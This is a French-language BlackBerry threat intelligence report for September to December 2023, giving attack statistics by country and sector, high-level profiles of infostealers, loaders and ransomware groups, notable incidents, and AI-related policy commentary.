BlackBerry Rapport trimestriel sur la menace mondiale - mars 2024
Des renseignements exploitables et contextualisés pour accroître votre cyber-résilience
Édition de mars 2024
Période de référence : 1er septembre - 31 décembre 2023
Introduction
À l'aube de l'année 2024, nous marquons une année civile complète de rapports trimestriels de veille sur les menaces mondiales ( BlackBerry® Global Threat Intelligence Reports). Et quelle année ! Au cours des 12 derniers mois, les rapports BlackBerry sont devenus un guide de référence essentiel pour les professionnels de la cybersécurité et les RSSI du monde entier, afin d'aider les décideurs à se tenir au courant des dernières menaces, tendances et défis en matière de cybersécurité qui affectent le secteur. En utilisant à la fois des données télémétriques internes et des ressources externes, BlackBerry vise à fournir un examen complet du paysage mondial des cybermenaces au cours de cette période de référence.
Dans cette dernière édition, l'équipe de recherche et de renseignement sur les menaces deBlackBerry a affiné et reformaté la section du rapport consacrée aux infrastructures critiques. Cette section importante comprend désormais les secteurs de la finance, des soins de santé et de l'administration publique, ainsi que les secteurs existants des infrastructures critiques, à savoir les services publics et les communications. Dans une nouvelle section, nous abordons également les menaces et les défis auxquels sont confrontées les entreprises commerciales.
Pour compléter le rapport, nous aborderons les principales menaces de logiciels malveillants auxquelles nous avons été confrontés au cours de la période de référence sur tous les principaux systèmes d'exploitation (OS) et nous inclurons des données exploitables pour MITRE D3FEND™ et MITRE ATT&CK®.
Nous sommes également fiers de présenter une nouvelle section de notre équipe "Incident Response" (IR) et "Forensics" de notre division " Professional Services", qui traite des menaces qu'elle a rencontrées dans le cadre de ses missions auprès des clients.
Ce rapport couvre les menaces rencontrées entre septembre et décembre 2023.
Points forts du rapport
120 jours en chiffres
Contrairement aux rapports précédents de Global Threat Intelligence qui couvrent des périodes de trois mois, ce rapport couvre quatre mois, du 1er septembre au 31 décembre 2023. Au cours de cette période, les solutions de cybersécuritéBlackBerry® ont arrêté plus de 5,2 millions de cyberattaques visant des entités protégées par les solutions BlackBerry . Cela équivaut à environ 31 attaques par minute, soit une augmentation de 19 % par rapport aux 26 attaques par minute de la période précédente.
Au cours de cette période, le taux de hachage de nouveaux logiciels malveillants par minute a augmenté de 27 % par rapport à la période précédente, l'équipe de recherche et de renseignement sur les menaces du site BlackBerry ayant enregistré 3,7 hachages uniques par minute, contre 2,9 nouveaux échantillons de logiciels malveillants par minute.
Infrastructures critiques et entreprises commerciales
Au cours de cette période, la télémétrie interne de BlackBerrya enregistré que plus de 62 % des attaques totales liées à l'industrie visaient des infrastructures critiques. Les logiciels malveillants et autres cybermenaces peuvent avoir un impact débilitant sur les infrastructures, affectant non seulement l'entité infectée, mais potentiellement l'ensemble de la région ou du pays que ces actifs critiques soutiennent.
En outre, nous avons un tout nouveau secteur d'activité à étudier : les entreprises commerciales. Ce secteur comprend la vente au détail, les biens d'équipement, le commerce de gros et d'autres industries connexes. Notre télémétrie montre que près de 33 % de toutes les attaques liées à l'industrie qui ont ciblé des actifs protégés par BlackBerry concernaient le secteur des entreprises commerciales. En outre, 53 % de ces attaques ont utilisé des logiciels malveillants uniques, ce qui suggère que les attaquants ont créé de nouveaux hashs de logiciels malveillants, en les construisant à partir de zéro ou en modifiant des logiciels malveillants existants pour leur donner une meilleure chance d'infiltrer leur cible.
Les nouveaux logiciels malveillants sont généralement utilisés lorsque l'attaquant s'intéresse de près à une organisation ou à un secteur très spécifique. L'utilisation d'un logiciel malveillant unique par un acteur de la menace (par opposition à l'utilisation d'un logiciel malveillant de base ou "prêt à l'emploi") est généralement intentionnelle, ce qui signifie qu'elle vise à échapper aux défenses, qui sont souvent des défenses traditionnelles basées sur des signatures statiques. Les attaquants peuvent s'appuyer sur de simples scripts d'automatisation qui créent de nouveaux logiciels malveillants (c'est-à-dire des hachages uniques) en compilant le même code source avec des variations minimes, encore et encore.
Ransomware et Infostealers frappent
Comme nous l'avions prévu dans le dernier rapport, une tendance externe commune a été observée tout au long de la période considérée : les ransomwares tirent parti de nouvelles vulnérabilités et se mobilisent en masse contre des cibles potentiellement vulnérables. La plupart des groupes de ransomwares opèrent dans un but purement lucratif et exploitent souvent les nouveaux exploits de type "zero-day" pour augmenter leurs chances de succès et pour gagner de l'argent.
Tout au long de la période considérée, des entités de premier plan opérant dans le monde entier, tant dans le secteur des infrastructures critiques que dans celui des entreprises commerciales, ont été frappées par des groupes de ransomware. Qu'il s'agisse de services de santé aux États-Unis ou d'un fournisseur d'énergie en Europe, les groupes de ransomwares se sont une fois de plus déchaînés, souvent au détriment de la sécurité publique et même de la vie humaine.
Sur une note positive, le FBI a récemment fait un grand pas en avant dans la lutte contre LockBit, l'un des plus grands groupes de ransomware dans le paysage actuel des menaces. Dans le cadre d'une opération mondiale connue sous le nom d'"Opération Cronos", les forces de l'ordre de 10 pays ont collaboré pour prendre le contrôle de l'infrastructure et du site de fuite du groupe LockBit, recueillir des informations sur leurs serveurs, procéder à des arrestations et imposer des sanctions. LockBit a refait surface en 2019, ciblant un large éventail d'organisations, notamment des banques et des compagnies aériennes. BlackBerry continue de collaborer avec les autorités policières internationales pour s'assurer que les groupes de menace tels que LockBit n'agissent pas en toute impunité.
Dans les secteurs des infrastructures critiques et des entreprises commerciales, un grand nombre de familles de voleurs d'informations ont été identifiées et bloquées grâce aux solutions de cybersécurité BlackBerry alimentées par Cylance® AI. Des logiciels malveillants de type "commodity" ont également été utilisés pour cibler un certain nombre de secteurs. Ces familles malveillantes sont souvent vendues sur des forums clandestins sous forme de logiciels malveillants en tant que service (MaaS) et utilisées dans d'innombrables campagnes de cyberattaques à grande échelle. Le MaaS est une branche désagréable du modèle SaaS (Software-as-a-Service) et abaisse considérablement les barrières à l'entrée pour les cybercriminels novices.
Renseignements utiles
L'objectif des Global Threat Intelligence Reports ( BlackBerry ) est de fournir des données pertinentes sur la cybersécurité ainsi que des renseignements contextuels sur les cybermenaces (CTI). Afin de poursuivre notre objectif de fournir des renseignements exploitables, nous avons inclus des sections sur les techniques courantes de MITRE et les contre-mesures appliquées. Cette section résume les 20 principales techniques ATT&CK de MITRE utilisées par les groupes de menace au cours de la période couverte par le présent rapport, et nous établissons des comparaisons avec la période précédente. Ces résultats peuvent être incorporés dans des simulations exploitables dans le cadre d'exercices d'équipe pourpre en menant des activités pratiques de modélisation des menaces avec nos 20 principales tactiques, techniques et procédures (TTP).
En outre, l'équipe de recherche et de renseignement sur les menaces ( BlackBerry ) s'est appuyée sur MITRE D3FEND pour dresser une liste de contre-mesures pour les principales techniques malveillantes observées de septembre à décembre 2023. Nous avons également inclus une section sur les données de détection et de réponse gérées (MDR) fournies par le CylanceGUARD® a fourni.
Enfin, j'aimerais remercier notre groupe d'élite de chercheurs mondiaux de l'équipe de recherche et de renseignement sur les menaces BlackBerry pour continuer à produire une recherche de classe mondiale, première sur le marché, qui informe et éduque notre lectorat tout en améliorant continuellement nos données et nos produits et services basés sur l'IA Cylance . Nous espérons que les informations détaillées et exploitables présentées dans notre dernière édition vous seront utiles.
Ismael Valenzuela
Vice-président, Threat Research and Intelligence chez BlackBerry
@aboutsecurity
Cyberattaques au cours de cette période
De septembre à décembre 2023, les solutions de cybersécurité de BlackBerry ont stoppé plus de 5 200 000 cyberattaques. Bien que cette période soit plus longue que les éditions précédentes, une analyse des données par jour montre une augmentation de 19 % des cyberattaques stoppées au cours de cette période par rapport à notre dernière édition.
En outre, nous avons observé une moyenne d'environ 5 300 échantillons uniques de logiciels malveillants par jour ciblant nos clients, soit un total de plus de 630 000 échantillons enregistrés au cours de cette période, ce qui représente une augmentation de 27 % par rapport à la période précédente.
Attaques par pays : Statistiques
Attaques stoppées
La figure 2 ci-dessous présente les cinq pays où les solutions de cybersécurité de BlackBerry ont empêché le plus grand nombre de cyberattaques (c'est-à-dire le nombre total d'attaques stoppées). Comme dans le rapport précédent, les États-Unis ont reçu le plus grand nombre d'attaques, soit 76 % des attaques enregistrées au cours de cette période. Dans la région Asie-Pacifique, l'Australie et le Japon ont subi un nombre élevé d'attaques, ce qui leur a valu de figurer parmi les cinq premiers pays, l'Australie étant un nouveau venu dans notre classement, à la deuxième place, et le Japon se classant troisième, comme dans les rapports précédents. En Amérique latine, le Pérou a subi le quatrième plus grand nombre d'attaques, comme dans les rapports précédents. Le Canada a connu le cinquième plus grand nombre d'attaques au cours de la période couverte par ce rapport.
Malware unique
La figure 2 montre également les cinq pays où les solutions de cybersécurité BlackBerry ont enregistré le plus grand nombre de hachages uniques de logiciels malveillants. Les États-Unis se classent au premier rang, avec le pourcentage le plus élevé de logiciels malveillants uniques. Les deuxième, troisième et quatrième pays ayant enregistré le pourcentage le plus élevé de logiciels malveillants uniques se trouvent tous dans la région Asie-Pacifique. La Corée du Sud arrive en deuxième position, suivie du Japon (troisième) et de l'Australie (quatrième). Le Canada arrive en cinquième position pour la deuxième période consécutive.
En examinant la figure 2 ci-dessus, il est évident que le nombre total d'attaques stoppées par pays n'est pas nécessairement en corrélation avec le nombre de hachages uniques enregistrés.
Un certain nombre de facteurs expliquent ces résultats, notamment la motivation des attaquants, la complexité des attaques et les objectifs d'une attaque. Un attaquant peut avoir pour objectif de cibler la population générale d'un pays (ou d'une industrie spécifique), en utilisant des campagnes de spam pour cibler les masses. Un hachage peut être très facilement remanié, ce qui n'a pas d'incidence sur l'exécution du code malveillant du fichier, mais modifie les algorithmes de hachage uniques d'un fichier pour le faire apparaître différemment aux yeux d'un scanner anti-malware.
Les attaquants peuvent également utiliser des logiciels malveillants et des outils plus courants ou "prêts à l'emploi" pour causer des dommages à grande échelle. Cependant, d'autres peuvent se concentrer sur un petit groupe de personnes, un secteur d'activité ou une entreprise en particulier. Dans les cas hyperciblés, les acteurs de la menace peuvent cibler des employés individuels d'une entreprise qui les intéresse. Ces acteurs malveillants peuvent même déployer des outils et des tactiques plus uniques contre des cibles très spécifiques et généralement de grande valeur, en utilisant des logiciels d'IA générative pour créer des "deepfakes".
La figure 3 ci-dessus montre que le nombre total d'attaques stoppées et de hachages uniques de logiciels malveillants trouvés varie par pays au fil du temps, de la période de référence précédente à la période de référence actuelle.
- Les États-Unis, le Japon et le Pérou restent au même niveau en ce qui concerne le nombre total d'attaques stoppées, tandis que la Corée du Sud passe de la troisième à la deuxième place du classement en ce qui concerne les logiciels malveillants uniques, dépassant le Japon.
- En outre, dans la région Asie-Pacifique, l'Australie a été la nouvelle cible de la plupart des attaques arrêtées au cours de la période considérée, se classant au deuxième rang après les États-Unis. L'Australie s'est classée au quatrième rang pour le nombre de hachages uniques ciblant les systèmes des clients.
- BlackBerryLa télémétrie de la Commission européenne a montré que les entités basées au Canada ont subi moins d'attaques au cours de cette période, passant de la deuxième à la cinquième place. Dans nos données uniques sur les logiciels malveillants au cours de cette période, le Canada a conservé sa cinquième place.
L'entrée récente de l'Australie dans notre liste des cinq pays où le plus d'attaques ont été stoppées peut s'expliquer par les récents événements géopolitiques. En novembre 2023, l'Australian Signals Directorate (ASD) a publié son rapport annuel 2022-2023 sur les cybermenaces, qui révèle les principales tendances de la cybercriminalité auxquelles sont confrontés les gouvernements, les entreprises et les particuliers australiens. Dans son rapport, l'ASD a identifié le partenariat AUKUS, qui met l'accent sur les sous-marins à propulsion nucléaire et d'autres capacités militaires avancées, comme "une cible probable pour les acteurs étatiques qui cherchent à voler la propriété intellectuelle pour leurs propres programmes militaires." Le directeur de l'ASD a ajouté qu'à mesure que l'Australie "renforce ses capacités militaires, cela va évidemment attirer l'attention sur les domaines auxquels d'autres acteurs vont s'intéresser".
L'ASD a également indiqué que près de 94 000 signalements d'activités cybercriminelles ont été faits aux forces de l'ordre par des particuliers et des entreprises en Australie en 2023, soit une augmentation de 23 % par rapport à l'année précédente, les ransomwares causant à eux seuls jusqu'à 3 milliards de dollars de dommages à l'économie australienne chaque année. Les pertes subies par les petites entreprises australiennes victimes de cyberattaques se sont élevées en moyenne à près de 46 000 dollars par entreprise l'année dernière, contre 30 000 dollars l'année précédente.
Pour contrer cette recrudescence de la cyberactivité, l'ASD a annoncé le lancement de sa campagne de sensibilisation à la cybersécurité "Act Now, Stay Secure", qui identifie les principales cybermenaces pesant sur les particuliers et les petites et moyennes entreprises. La campagne souligne la nécessité d'"agir maintenant" pour faire face aux cybermenaces, déclarant que "pendant trop longtemps, les citoyens et les entreprises australiens ont été laissés à eux-mêmes face aux cybermenaces mondiales", et présente une vision audacieuse pour être "un leader mondial de la cybersécurité d'ici 2030".
Attaques par secteur d'activité : Statistiques
La figure 4 ci-dessous montre à la fois les attaques stoppées et les hachages uniques trouvés par BlackBerry dans chaque secteur. Contrairement aux rapports précédents, nous avons mis l'accent sur les infrastructures critiques en regroupant en une seule section plusieurs secteurs industriels clés qui étaient auparavant examinés séparément. Nous avons ainsi aligné nos définitions des infrastructures critiques sur celles de l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA). D'après les graphiques ci-dessous, plus de 62 % des attaques contre les industries enregistrées par BlackBerry étaient dirigées contre des organisations d'infrastructures critiques.
Nous avons également réorganisé notre télémétrie pour inclure les entreprises commerciales, qui représentaient 33 % de toutes les attaques contre les industries arrêtées au cours de cette période. Cependant, 53 % des hachages uniques enregistrés visaient des entreprises commerciales. (Pour rappel, le fait de trouver plus de hashs uniques signifie que les attaquants étaient particulièrement intéressés par la violation de ces types d'organisations, généralement parce qu'une attaque réussie serait plus lucrative).
Cyberattaques par secteur d'activité
Infrastructures critiques
Les infrastructures critiques constituent l'épine dorsale de toute société moderne et sont essentielles à tous les aspects de son fonctionnement. En fait, la CISA, basée aux États-Unis, a défini 16 secteurs disparates comme faisant partie de l'infrastructure critique. Il s'agit notamment des transports, des soins de santé, de l'énergie, des communications, des finances, de la défense et du secteur industriel.
Comme les systèmes et les actifs de bon nombre de ces secteurs sont tissés ensemble dans un paysage numérique interconnecté, ils se retrouvent souvent dans le collimateur des acteurs de la cybermenace qui tentent d'exploiter les failles et les vulnérabilités de la sécurité pour des raisons diverses.
Cela s'est vérifié tout au long de la dernière période de référence, au cours de laquelle CylanceENDPOINT™ by BlackBerry et d'autres solutions de cybersécurité BlackBerry ont permis d'arrêter plus de deux millions d'attaques contre divers secteurs au sein des infrastructures critiques, le secteur financier ayant subi à lui seul plus d'un million d'attaques.
En outre, les organisations gouvernementales et publiques ont subi la plus grande diversité d'attaques, avec plus de 36 % des hachages uniques ciblant ce secteur.
Principales menaces pesant sur les infrastructures critiques
Les cybermenaces qui ciblent ce large éventail de secteurs sont susceptibles de provoquer des perturbations massives et de mettre hors d'état de nuire ou de compromettre les biens, systèmes et réseaux essentiels de leurs entités respectives. Cela peut avoir de graves conséquences sur la sécurité économique, la santé publique et la stabilité sociale d'une nation, indépendamment de l'ampleur de l'attaque, du développement économique de la nation ou de son niveau de vie.
BlackBerry a observé plusieurs familles de logiciels malveillants ciblant divers secteurs dans notre télémétrie interne au cours de la période couverte par le présent rapport :
PrivateLoader est une famille de téléchargeurs malveillants, écrits en C++ et observés en permanence depuis leur découverte en 2021. Ce logiciel malveillant est souvent utilisé pour faciliter le déploiement d'infostealers sur l'appareil d'une victime. D'après notre télémétrie, PrivateLoader a été observé au cours de la période couverte par le présent rapport, tentant de cibler des systèmes liés aux services financiers, à l'alimentation et à l'agriculture, ainsi qu'aux installations gouvernementales.
PrivateLoader est connu pour distribuer un large éventail de charges utiles malveillantes plus ou moins complexes. Le réseau de distribution du logiciel malveillant est géré par un service souterrain de paiement à l'installation (PPI), qui finance l'utilisation et le développement continus du logiciel malveillant et de son infrastructure.
RisePro est un voleur d'informations sur les produits de base qui a été vu dans la nature depuis 2022. En étudiant les indicateurs de compromission (IoC) de PrivateLoader, nous avons remarqué que plusieurs échantillons tentaient de déployer des logiciels malveillants par l'intermédiaire de son service de distribution, y compris RisePro. Une fois sur l'appareil de la victime, RisePro tente de communiquer avec son système de commande et de contrôle (C2) et d'obtenir illicitement des données privées et sensibles avant de les envoyer aux serveurs de l'attaquant. Ces données volées peuvent être vendues à un tiers malveillant ou utilisées dans le cadre d'activités secondaires ciblant la victime.
SmokeLoader est un logiciel malveillant polyvalent qui a été signalé par BlackBerry au cours des périodes de rapport précédentes. Ce logiciel malveillant agit comme une porte dérobée indépendante, mais il est souvent utilisé comme mécanisme de livraison pour d'autres logiciels malveillants. SmokeLoader est souvent téléchargé par inadvertance via des documents ou des liens d'hameçonnage avant de s'installer sur un appareil ciblé. Ce logiciel malveillant a été observé dans le secteur de l'énergie au cours de la période couverte par ce rapport.
Au cours de la période considérée, le Centre national ukrainien de coordination de la cybersécurité (NCSCC) a notamment constaté une recrudescence des attaques liées à SmokeLoader visant également des organisations gouvernementales. Ce qui rend SmokeLoader si puissant, c'est sa capacité à déployer divers autres logiciels malveillants sur l'appareil de la victime.
SmokeLoader a été connu dans le passé pour déposer une pléthore d'infostealers tels qu'Amadey, RedLine et Vidar, mais aussi pour servir de mécanisme de distribution de ransomwares. Le groupe de menace à l'origine du ransomware 8Base a déjà utilisé SmokeLoader pour distribuer une variante du ransomware Phobos.
PikaBot est un logiciel malveillant furtif et évasif apparu au début de l'année 2023 et qui a constitué une menace importante tout au long de l'année. Ce logiciel malveillant modulaire présente de nombreuses similitudes avec le cheval de Troie QakBot et peut recevoir diverses commandes de son C2. Au cours de la période couverte par le présent rapport, PikaBot a été identifié sur des entités gouvernementales et du secteur de l'énergie.
PikaBot est persistant et possède de nombreuses fonctions qui l'empêchent d'être analysé par les chercheurs de menaces, y compris plusieurs contrôles anti-sandbox/anti-analyse. Une fois sur l'appareil d'une victime, le logiciel malveillant peut recevoir et exécuter des commandes pour collecter des informations précieuses sur l'appareil et exécuter les ordres reçus de son C2.
Les voleurs d'informations sur les matières premières ont également été modérément actifs tout au long de ce trimestre. De nombreux voleurs d'informations sont vendus en tant que MaaS et utilisés dans des campagnes à grande échelle.
LummaStealer (LummaC2) est un voleur d'informations basé sur le langage C qui se concentre sur l'exfiltration de données privées et sensibles de l'appareil de la victime. LummaStealer est notamment capable d'obtenir des données de portefeuilles de crypto-monnaies et des données d'extension de navigateur pour l'authentification à deux facteurs (2FA). Tout au long de la période couverte par le rapport, LummaStealer a été observé par BlackBerry , ciblant des institutions financières et des entités gouvernementales.
RecordBreaker (RaccoonStealer) est un autre voleur d'informations largement répandu qui a été temporairement arrêté en raison de l'arrestation d'un des principaux membres du groupe de menace en 2022. Cependant, le groupe est revenu à la mi-2023 avec une version mise à jour. Notre télémétrie a enregistré RecordBreaker ciblant des établissements de soins de santé, à la fois au cours de cette période de rapport et de la précédente.
RedLine infostealer a été l'une des menaces les plus observées par BlackBerrydans les rapports précédents. Ce voleur compilé en .NET se concentre sur le grattage d'informations d'identification et le vol de plusieurs logiciels et plateformes numériques, en particulier d'informations de cartes de crédit et de portefeuilles de crypto-monnaies.
RedLine est largement disponible via des forums clandestins et est vendu sous forme d'abonnement ou de produit autonome à un prix relativement peu élevé. Cette famille de logiciels malveillants a principalement ciblé les secteurs des communications et du gouvernement au cours de la période couverte par le rapport.
Paysage plus large des menaces pesant sur les infrastructures critiques
Tout au long de la période couverte par le présent rapport, le paysage général de la cybermenace a également été très actif, avec un certain nombre d'attaques notables contre des organisations d'infrastructures critiques dans le monde entier.
À la mi-octobre, l'hôpital communautaire de Morrison, basé dans l'Illinois, a été la victime présumée d'une intrusion par le gang du ransomware BlackCat/ALPHV, qui a fait son apparition sur son site web obscur. L'hôpital lui-même a publié une notification de sécurité plusieurs semaines plus tard sur son site, indiquant qu'il avait subi un incident fin septembre qui "impliquait l'accès d'une partie non autorisée à notre environnement réseau". La notification ne mentionnait toutefois pas le nom de l'attaquant et ne précisait pas si des fichiers avaient été verrouillés ou dérobés.
En novembre, l'entité énergétique publique slovène Holding Slovenske Elektrarne (HSE) a été victime d'une attaque par ransomware. En tant que fournisseur d'environ 60 % de la production énergétique du pays, il est heureux que la violation et le cryptage des fichiers n'aient pas entravé la production ou la sortie de l'énergie.
Bien que les attaquants n'aient pas été officiellement nommés, le groupe Rhysida ransomware pourrait être le coupable. Ce groupe a affirmé avoir fait des victimes au sein de HSE sur son site web plusieurs semaines plus tard.
En novembre, on a appris qu'une autre entité publique avait été victime d'une attaque et d'une intrusion de la part d'un gang de ransomwares. Cette fois, il s'agissait d'une société de services de télécommunications appartenant en grande partie à l'État, qui avait été victime d'une attaque un mois auparavant par le gang RansomEXX, qui avait dérobé jusqu'à 6 Go de données. Ces données comprenaient de nombreuses formes d'informations personnelles identifiables (PII). Des rapports indiquent également qu'un fichier CSV contenant des informations sur plus d'un million de clients a été diffusé sur le dark web.
RansomEXX (alias Defray et Defray777) est une famille de ransomwares apparue pour la première fois en 2018. Il existe des variantes Windows et Linux de cette famille de logiciels malveillants, qui a notamment été utilisée dans des exploits très médiatisés sur des agences gouvernementales et des fabricants. RansomEXX fonctionne comme un modèle de ransomware-as-a-service (RaaS), avec une variante nommée RansomEXX2 écrite dans le langage de programmation Rust qui a fait surface en 2022.
Aux États-Unis, la CISA a lancé une alerte le 28 novembre 2023, en réponse à ce qu'elle a appelé "l'exploitation active des contrôleurs logiques programmables (PLC) d'Unitronics". Il s'agit d'ordinateurs utilisés dans les installations de traitement de l'eau et des eaux usées. L'alerte précisait que ces types d'installations étaient activement ciblés par des acteurs de la cybermenace et conseillait aux autres installations de traitement de l'eau et des eaux usées de suivre toutes les directives et mesures de précaution recommandées.
Dans la continuité des activités mentionnées dans l'édition de novembre 2023 de notre Global Threat Intelligence Report, le gang LockBit a continué à cibler des organisations d'infrastructures critiques, malgré une tentative de démantèlement par le FBI en février 2024. La veille de Noël 2023, le gang LockBit a été impliqué dans une attaque contre le réseau hospitalier allemand Katholische Hospitalvereinigung Ostwestfalen gGmbH (KHO). L'attaque matinale a permis d'ouvrir une brèche et de crypter des données de fichiers, ce qui a entraîné de graves perturbations dans les services de trois hôpitaux différents du KHO.
Le gang LockBit a également ciblé d'autres entités et secteurs au sein d'infrastructures critiques en exploitant la vulnérabilité CVE-2023-4966 - la vulnérabilité Citrix Bleed - pour obtenir un accès initial. Le gouvernement américain a donc publié un avis conjoint de cybersécurité (CSA) suggérant aux organisations d'appliquer des correctifs et de suivre toutes les lignes directrices et les meilleures pratiques recommandées en matière d'atténuation des risques.
Pour ceux qui ont été victimes de LockBit dans le passé, des outils de récupération de fichiers sont maintenant disponibles. Le FBI, Europol, la police japonaise et la National Crime Agency ont collaboré pour mettre ces outils à disposition sur le portail "No More Ransom", désormais disponible en 37 langues.
Entreprise commerciale
BlackBerry protège un large éventail de clients et d'industries dans le monde entier. Le secteur des entreprises commerciales correspond aux services commerciaux et professionnels, aux biens d'équipement, aux matériaux, à la vente au détail, à l'automobile, à l'industrie manufacturière, etc.
Plus d'un million d'attaques ont visé le secteur des entreprises commerciales au cours de cette période, soit près de 33 % de toutes les attaques stoppées par les solutions de cybersécurité de BlackBerry . En outre, 53 % des hachages uniques ont ciblé ce secteur, dont plus de 170 000 nouveaux fichiers de logiciels malveillants en seulement 120 jours.
Principales menaces pour les entreprises commerciales
Les industries commerciales doivent traiter de grandes quantités de transactions EFT et de données PII, ce qui en fait des cibles de choix pour les voleurs d'informations. Ces données hautement sensibles peuvent ensuite être détenues par l'acteur de la menace en échange d'une rançon ou vendues au plus offrant via les forums du dark web.
Tout au long de la période couverte par le rapport, les entreprises commerciales ont souvent été attaquées par des voleurs d'informations notoires, comme RedLine et Formbook/XLoader, que BlackBerry a déjà signalés dans des rapports antérieurs.
Une pléthore d'autres chargeurs de marchandises et de voleurs d'informations, tels que SmokeLoader, PrivateLoader, Amadey, et les logiciels de contrôle et de surveillance à distance (alias Remcos) suivent de près en termes de popularité.
Formbook est le voleur d'informations MaaS de longue date qui, ces dernières années, s'est rebaptisé XLoader. Ce logiciel malveillant, qui sévit dans la nature depuis 2016, s'empare des données des formulaires web et enregistre les frappes de l'utilisateur, les données du navigateur et les données du presse-papiers. Il est capable d'obtenir et d'exfiltrer des données à partir de plus de 90 applications différentes. Une version basée sur macOS est disponible depuis 2021.
Remcos est un outil d'accès à distance (RAT) vendu dans le commerce qui permet de contrôler des ordinateurs à distance. Bien qu'il soit présenté comme un outil de surveillance légitime, il est souvent utilisé de manière abusive dans les campagnes de piratage et a la faveur des groupes de cybercriminels. Le Cert-UA a attribué à un Remcos une cyberattaque de masse contre l'Ukraine et la Pologne.
Notre télémétrie a également enregistré un certain nombre de voleurs d'informations plus récents, à savoir RisePro Stealer et OriginLogger.
OriginLogger est l'évolution d'un malware très connu, Agent Tesla. Souvent vendue sous forme de MaaS par abonnement, la famille Agent Tesla se compose de RAT dotés de fonctionnalités permettant de voler des informations dans les navigateurs Web les plus courants, de capturer des frappes clavier et même de réaliser des captures d'écran de l'appareil de la victime.
Le paysage des menaces pour les entreprises commerciales au sens large
Les entreprises commerciales, en particulier l'industrie manufacturière et le commerce de détail, ont été la cible de nombreuses attaques au cours des quatre derniers mois.
En novembre, des détaillants israéliens auraient été attaqués par le groupe hacktiviste Cyber Toufan, qui a également frappé la société d'hébergement israélienne Signature-IT. Depuis novembre 2023, dans le contexte du conflit entre Israël et le Hamas à Gaza, le groupe aurait lancé des centaines d'opérations cybernétiques contre des cibles israéliennes. De nombreux détaillants internationaux, tels qu'IKEA, ont été fortement touchés par l'attaque de Signature-IT. Dans un message publié sur sa chaîne Telegram, le groupe a affirmé avoir compromis plus de 150 victimes. Ils auraient effacé et détruit plus de 1 000 serveurs et bases de données critiques.
Le mois de décembre nous a rappelé que la plus grande menace pour les entreprises est souvent leur propre complaisance. Une base de données non protégée accessible par Internet et hébergée par le Real Estate Wealth Network a été découverte par des acteurs malveillants et pillée. La base de données contenait 1,16 To de données, soit environ 1,5 milliard d'enregistrements, y compris les noms des propriétaires, des vendeurs et des investisseurs. La base de données représente une collection centrale de données immobilières américaines, y compris les adresses des fonctionnaires et même des informations sur la dette.
Les victimes de ces attaques varient en fonction des objectifs du groupe criminel responsable du ransomware. Fin 2023, l'un des plus grands fabricants de vêtements et de chaussures, VF Corporation, a été attaqué par le groupe de ransomware ALPHV (BlackCat). L'enquête n'a pas encore abouti, mais il a été confirmé que les données de 35,5 millions de clients de marques telles que North Face, Timberland et Vans ont été volées.
Analyse géopolitique et commentaires
Le rapport 2024 Global Risk Report du Forum économique mondial classe la menace de la cybersécurité parmi les "risques mondiaux les plus graves prévus pour les deux prochaines années". Grâce à des techniques de plus en plus sophistiquées, y compris l'utilisation de l'intelligence artificielle (IA), le consensus est que les cyberattaques continueront à être très perturbatrices et à cibler de plus en plus les infrastructures critiques.
BlackBerry La télémétrie montre que les infrastructures critiques ont subi de nombreuses attaques au cours de la période couverte par le présent rapport. Les attaques sont de plus en plus sophistiquées, avec l'utilisation de nouvelles techniques de logiciels malveillants, y compris celles générées par l'IA, ce qui augmente le risque de paralyser les infrastructures critiques. Les gouvernements du monde entier ont pris une série de mesures visant à renforcer la cyber-résilience des infrastructures critiques, en mettant particulièrement l'accent sur la protection contre les risques liés à l'utilisation malveillante de l'IA.
Si les gouvernements reconnaissent que l'IA a un potentiel important, notamment en ce qui concerne l'amélioration de l'efficacité opérationnelle des systèmes d'infrastructures critiques, nombre d'entre eux craignent également que la volonté d'optimiser l'efficacité par le déploiement de systèmes basés sur l'IA dans les infrastructures critiques ne pose de sérieux risques en matière de sécurité.
Pour éviter cela, les gouvernements appellent l'industrie à donner la priorité à la sécurité lors du développement et du déploiement de modèles d'IA de plus en plus puissants :
"Au cours des quatre dernières décennies, de la création d'Internet à l'adoption massive de logiciels, en passant par l'essor des médias sociaux, nous avons vu la sûreté et la sécurité passer au second plan, les entreprises privilégiant la rapidité de mise sur le marché et les fonctionnalités au détriment de la sécurité. Le développement et la mise en œuvre de logiciels d'IA doivent rompre le cycle de la rapidité au détriment de la sécurité".
- Feuille de route de l 'ASACI pour l'IA
Les gouvernements du monde entier se sont empressés d'élaborer et de publier des lignes directrices encourageant une approche "sécurisée par défaut" du développement et de l'utilisation de puissants systèmes d'IA. D'autres pays et alliances politiques comme le Royaume-Uni, le Canada, l'UE et le G7 ont également publié des lignes directrices sur le développement et l'utilisation responsables de systèmes d'IA avancés. Il s'agit notamment de lignes directrices communes approuvées par plus de 20 agences nationales de cybersécurité dans le monde, qui soulignent la nécessité pour les concepteurs de systèmes d'IA de prendre des décisions éclairées sur la conception, le développement, le déploiement et l'exploitation des systèmes d'IA d'une manière qui donne la priorité à la sécurité tout au long du cycle de vie du système.
En outre, en octobre 2023, le président américain Biden a publié un décret sur l'intelligence artificielle sûre, sécurisée et digne de confiance(EO 14110). Ce décret demande notamment à la CISA d'évaluer les risques potentiels liés à l'utilisation de l'IA dans les secteurs des infrastructures critiques, y compris les façons dont le déploiement de l'IA peut rendre les systèmes d'infrastructures critiques plus vulnérables aux défaillances, aux attaques physiques et aux cyberattaques.
En novembre 2023, BlackBerry a annoncé un accord historique en matière de cybersécurité avec le gouvernement de Malaisie, lui permettant de tirer parti de la gamme complète de solutions de cybersécurité de confiance BlackBerry , afin de renforcer la position de la Malaisie en matière de sécurité. Dans le cadre de cet accord, BlackBerry s'est associé au SANS Institute pour ouvrir un centre d'excellence en cybersécurité (CCoE) à Kuala Lumpur, la capitale de la Malaisie, en 2024. Le CCoE offrira une formation spécialisée pour faire progresser les capacités et l'état de préparation de la Malaisie en matière de cybersécurité. BlackBerry est ravi d'aider à construire l'écosystème d'apprentissage de la cybersécurité du pays - en particulier dans les domaines de l'IA et de l'apprentissage automatique - pour contribuer à la croissance et au perfectionnement de la main-d'œuvre de la Malaisie dans le domaine de la cybersécurité, ainsi que pour rendre la région Indo-Pacifique plus sûre.
